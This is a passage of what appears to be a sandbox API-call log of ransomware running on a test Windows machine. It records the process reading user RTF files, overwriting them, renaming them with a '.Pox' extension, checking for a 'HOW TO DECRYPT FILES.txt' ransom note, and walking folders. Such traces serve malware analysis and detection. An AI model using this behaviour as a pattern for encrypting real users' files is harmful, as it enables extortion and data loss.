lpOldMode=0x3ae3d0) returned 1 [0040.041] GetFileType (hFile=0x26c) returned 0x1 [0040.041] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x61ee [0040.041] ReadFile (in: hFile=0x26c, lpBuffer=0x24156c8, nNumberOfBytesToRead=0x61ee, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x24156c8*, lpNumberOfBytesRead=0x3ae488*=0x61ee, lpOverlapped=0x0) returned 1 [0040.042] CloseHandle (hObject=0x26c) returned 1 [0040.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf", lpFilePart=0x0) returned 0x58 [0040.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\tujnejae gtq.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.058] GetFileType (hFile=0x26c) returned 0x1 [0040.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.058] GetFileType (hFile=0x26c) returned 0x1 [0040.058] WriteFile (in: hFile=0x26c, lpBuffer=0x2480fc0*, nNumberOfBytesToWrite=0x61f0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x2480fc0*, lpNumberOfBytesWritten=0x3ae47c*=0x61f0, lpOverlapped=0x0) returned 1 [0040.059] CloseHandle (hObject=0x26c) returned 1 [0040.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf", lpFilePart=0x0) returned 0x58 [0040.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf.Pox", lpFilePart=0x0) returned 0x5c [0040.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\tujnejae gtq.rtf"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28584980, ftCreationTime.dwHighDateTime=0x1d4cd1c, ftLastAccessTime.dwLowDateTime=0xded30de0, ftLastAccessTime.dwHighDateTime=0x1d4c5f5, ftLastWriteTime.dwLowDateTime=0x2a0f1ae0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x61f0)) returned 1 [0040.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.061] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\tujnejae gtq.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\tujnejae gtq.rtf.pox")) returned 1 [0040.061] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf", lpFilePart=0x0) returned 0x5c [0040.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\wtfoidnhed_h7scw.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.061] GetFileType (hFile=0x26c) returned 0x1 [0040.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0040.062] GetFileType (hFile=0x26c) returned 0x1 [0040.062] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x518f [0040.062] ReadFile (in: hFile=0x26c, lpBuffer=0x2487868, nNumberOfBytesToRead=0x518f, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x2487868*, lpNumberOfBytesRead=0x3ae488*=0x518f, lpOverlapped=0x0) returned 1 [0040.063] CloseHandle (hObject=0x26c) returned 1 [0040.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf", lpFilePart=0x0) returned 0x5c [0040.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\wtfoidnhed_h7scw.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.078] GetFileType (hFile=0x26c) returned 0x1 [0040.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.078] GetFileType (hFile=0x26c) returned 0x1 [0040.079] WriteFile (in: hFile=0x26c, lpBuffer=0x24ede24*, nNumberOfBytesToWrite=0x5190, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x24ede24*, lpNumberOfBytesWritten=0x3ae47c*=0x5190, lpOverlapped=0x0) returned 1 [0040.080] CloseHandle (hObject=0x26c) returned 1 [0040.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf", lpFilePart=0x0) returned 0x5c [0040.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf.Pox", lpFilePart=0x0) returned 0x60 [0040.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.081] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\wtfoidnhed_h7scw.rtf"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b1e950, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x56c3a320, ftLastAccessTime.dwHighDateTime=0x1d4d50d, ftLastWriteTime.dwLowDateTime=0x2a13dda0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x5190)) returned 1 [0040.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.081] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\wtfoidnhed_h7scw.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\wtfOidnhEd_h7Scw.rtf.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\wtfoidnhed_h7scw.rtf.pox")) returned 1 [0040.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.082] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpFilePart=0x0) returned 0x30 [0040.082] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpFilePart=0x0) returned 0x31 [0040.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0040.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae568) returned 1 [0040.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpFilePart=0x0) returned 0x33 [0040.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpFilePart=0x0) returned 0x34 [0040.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0040.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae568) returned 1 [0040.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x0) returned 0x31 [0040.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpFilePart=0x0) returned 0x32 [0040.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0040.122] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.122] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.122] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0040.123] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0040.123] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0040.123] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0040.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x0) returned 0x31 [0040.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpFilePart=0x0) returned 0x32 [0040.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0040.124] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.124] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.124] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0040.124] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0040.124] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.124] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0040.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0040.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x3a [0040.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpFilePart=0x0) returned 0x3b [0040.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0040.126] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.126] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0040.127] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae268 | out: 